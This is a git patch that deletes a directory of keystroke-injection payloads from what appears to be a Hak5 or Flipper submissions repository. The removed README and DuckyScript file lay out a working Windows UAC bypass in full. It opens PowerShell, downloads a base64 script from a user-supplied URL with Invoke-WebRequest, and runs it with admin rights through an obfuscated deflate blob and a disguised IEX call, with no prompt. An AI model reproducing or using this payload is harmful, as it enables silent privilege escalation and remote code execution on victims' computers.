From 124749f263c132837e14ab34bd29f685f6bc52cb Mon Sep 17 00:00:00 2001
From: I-Am-Jakoby <Michaelryanchitwood@gmail.com>
Date: Wed, 25 May 2022 15:19:25 -0500
Subject: [PATCH] Delete Payloads/Flip-UrAttaControl directory

---
 Payloads/Flip-UrAttaControl/README.md         | 104 ------------------
 .../UrAttaControl-Execute.txt                 |  30 -----
 2 files changed, 134 deletions(-)
 delete mode 100644 Payloads/Flip-UrAttaControl/README.md
 delete mode 100644 Payloads/Flip-UrAttaControl/UrAttaControl-Execute.txt

diff --git a/Payloads/Flip-UrAttaControl/README.md b/Payloads/Flip-UrAttaControl/README.md
deleted file mode 100644
index 866fedf..0000000
--- a/Payloads/Flip-UrAttaControl/README.md
+++ /dev/null
@@ -1,104 +0,0 @@
-![Logo](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/Assets/logo-170-px.png?raw=true)
-
-<!-- TABLE OF CONTENTS -->
-<details>
-  <summary>Table of Contents</summary>
-  <ol>
-    <li><a href="#Description">Description</a></li>
-    <li><a href="#getting-started">Getting Started</a></li>
-    <li><a href="#Contributing">Contributing</a></li>
-    <li><a href="#Version-History">Version History</a></li>
-    <li><a href="#Contact">Contact</a></li>
-    <li><a href="#Acknowledgments">Acknowledgments</a></li>
-  </ol>
-</details>
-
-# UrAttaControl
-
-A script used to open an elevated powershell console and execute admin level commands
-
-## Description
-
-Completely ran from the execute file. Replace the URL in that file with yours leading to a base64 script
-
-This script will use IEX to download a base64 script to the $Payload variable
-
-Using a keystroke injections attack a heavily obfuscated and encoded snippet will download and execute any base64 
-
-script saved in the $Payload variable
-
-This payload completely bypasses the UAC and will run any admin level script without a prompt
-
-You can use this function I wrote to convert your .ps1 sscripts to Base64
-
-https://github.com/I-Am-Jakoby/PowerShell-for-Hackers/blob/main/Functions/B64.md
-
-## Getting Started
-
-### Dependencies
-
-* DropBox or other file sharing service - Your Shared link for the intended file
-* Windows 10,11
-
-<p align="right">(<a href="#top">back to top</a>)</p>
-
-### Executing program
-
-* Plug in your device
-* A keystroke injection based payload will run
-
-<p align="right">(<a href="#top">back to top</a>)</p>
-
-## Contributing
-
-All contributors names will be listed here
-
-I am Jakoby
-
-<p align="right">(<a href="#top">back to top</a>)</p>
-
-## Version History
-
-* 0.1
-    * Initial Release
-
-<p align="right">(<a href="#top">back to top</a>)</p>
-
-<!-- CONTACT -->
-## Contact
-
-<div><h2>I am Jakoby</h2></div>
-  <p><br/>
-  
-  <img src="https://media.giphy.com/media/VgCDAzcKvsR6OM0uWg/giphy.gif" width="50"> 
-  
-  <a href="https://github.com/I-Am-Jakoby/">
-    <img src="https://img.shields.io/badge/GitHub-I--Am--Jakoby-blue">
-  </a>
-  
-  <a href="https://www.instagram.com/i_am_jakoby/">
-    <img src="https://img.shields.io/badge/Instagram-i__am__jakoby-red">
-  </a>
-  
-  <a href="https://twitter.com/I_Am_Jakoby/">
-    <img src="https://img.shields.io/badge/Twitter-I__Am__Jakoby-blue">
-  </a>
-  
-  <a href="https://www.youtube.com/c/IamJakoby/">
-    <img src="https://img.shields.io/badge/YouTube-I_am_Jakoby-red">
-  </a>
-
-  Project Link: [https://github.com/I-Am-Jakoby/hak5-submissions/tree/main/RubberDucky/Payloads/RD-UrAttaControl)
-</p>
-
-
-
-<p align="right">(<a href="#top">back to top</a>)</p>
-
-<!-- ACKNOWLEDGMENTS -->
-## Acknowledgments
-
-* [Hak5](https://hak5.org/)
-* [MG](https://github.com/OMG-MG)
-
-<p align="right">(<a href="#top">back to top</a>)</p>
diff --git a/Payloads/Flip-UrAttaControl/UrAttaControl-Execute.txt b/Payloads/Flip-UrAttaControl/UrAttaControl-Execute.txt
deleted file mode 100644
index 091f6e4..0000000
--- a/Payloads/Flip-UrAttaControl/UrAttaControl-Execute.txt
+++ /dev/null
@@ -1,30 +0,0 @@
-REM     Title: UrAttaControl
-REM
-REM     Author: I am Jakoby
-REM
-REM     Description: This is a UAC bypass payload that will open an elevated powershell console and run any script.
-REM     Reaplce the URL down below with a link to a base64 encoded payload you have. See README.md for more details
-REM
-REM     Target: Windows 10, 11
-REM
-REM	  NOTES: Additionally instead of pulling down your script with IWR you can hardcode the Base64 script to the $Payload variable
-REM     EXAMPLE: $Payload = "cwB0AGEAcgB0ACAAbgBvAHQAZQBwAGEAZAA="		- This Base64 script will open notepad
-REM
-REM     You can use this function I wrote to convert your .ps1 sscripts to Base64
-REM     https://github.com/I-Am-Jakoby/PowerShell-for-Hackers/blob/main/Functions/B64.md	
-REM
-GUI r
-DELAY 500
-STRING powershell 
-ENTER
-REM
-DELAY 1000
-REM
-STRING $url = "YOUR-URL-WITH-BASE64-ENCODED-SCRIPT"
-SHIFT ENTER
-STRING $Payload = (Invoke-WebRequest $url'?dl=1').Content
-SHIFT ENTER
-STRING ( nEw-obJECt Io.cOMprEssion.dEfLAtEStreAM([iO.MEMoRysTream][coNVerT]::FrOMBasE64sTring( 'hY69CsIwFEZf5RK6ph0ci1MHBZEKQacsoflahfyRRKpvb1MQnOp2h3vOd6r+fNiz4GfEdIcxNV4gDjdQdVFv45Um1kZMpPRyHU/dVQo/5llFyM6olJBk7e0kRaFlH+Dk4K1VTjNqNFWLn5rxn8ImnpDzw01Jds94Q1xpVtSs8KPXy0BALIGtyCpmLgwQiCfarXoNg4zNSPZN2f79rVmRDw=='), [SySTEM.Io.cOmprEsSION.comprEsSiOnmOdE]::DECoMPress )| ForeAch{ nEw-obJECt IO.stReaMReAdEr( $_, [SYSTEm.TEXT.encODINg]::aSciI ) } |ForEaCh { $_.rEAdtoENd() } )|& ( $VeRBosEPreFEreNcE.tosTRING()[1,3]+'x'-joIN'')
-SHIFT ENTER
-STRING exit
-ENTER